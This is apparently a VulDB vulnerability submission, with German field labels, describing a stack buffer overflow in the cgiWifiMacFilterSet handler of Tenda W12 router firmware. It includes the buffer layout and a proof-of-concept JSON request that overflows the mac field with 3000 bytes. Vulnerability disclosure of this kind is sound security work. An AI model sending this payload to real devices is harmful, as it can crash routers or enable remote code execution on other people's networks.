| Titel | Tenda W12 V3.0.0.7(4763) Stack-based Buffer Overflow |
|---|
| Beschreibung | # Stack Overflow Vulnerability in the `cgiWifiMacFilterSet` Function of Tenda W12
## Basic Information
- Vendor: Tenda
- Product: W12
- Firmware Version: V3.0.0.7(4763)
- Firmware Release Date: 2026-03-04
## Vulnerability Overview
A stack overflow vulnerability exists in the `cgiWifiMacFilterSet` function of the `/bin/httpd` binary in Tenda W12 V3.0.0.7(4763). An attacker can remotely trigger the vulnerability by sending a specially crafted request.
## Detailed Analysis
In the `cgiWifiMacFilterSet` function, a stack overflow occurs during JSON request parsing. The `WifiMacList` buffer is 512 bytes in size and is located 0x710 (1808) bytes away from the bottom of the stack. When the length of the `wifiMacFilterSet.macList.mac` field exceeds 512 bytes during parsing, it can overflow into adjacent fields. If it exceeds 1808 bytes, it may affect the previous stack frame.
PoC request
```
{
"wifiMacFilterSet": {
"radio": "2.4G",
"action": "add",
"ssidIndex": "0",
"filterEnable": "1",
"filterMode": "blacklist",
"macList": [
{
"index": 1,
"macEn": "1",
"mac": "AA:BB:CC:DD:EE:FF" + "A" * 3000
}
]
}
}
```
## Impact
- Stack Overflow
- May lead to:
- Device crash (DoS)
- Potential remote code execution (RCE)
|
|---|
| Quelle | ⚠️ http://cdn2.v50to.cc/cgiWifiMacFilterSet_overflow.zip |
|---|
| Benutzer | CookedMelon (UID 52513) |
|---|
| Einreichung | 06.05.2026 08:36 (vor 29 Tagen) |
|---|
| Moderieren | 30.05.2026 18:47 (24 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 367472 [Tenda W12 3.0.0.7(4763) /bin/httpd cgiWifiMacFilterSet wifiMacFilterSet.macList.mac Pufferüberlauf] |
|---|
| Punkte | 17 |
|---|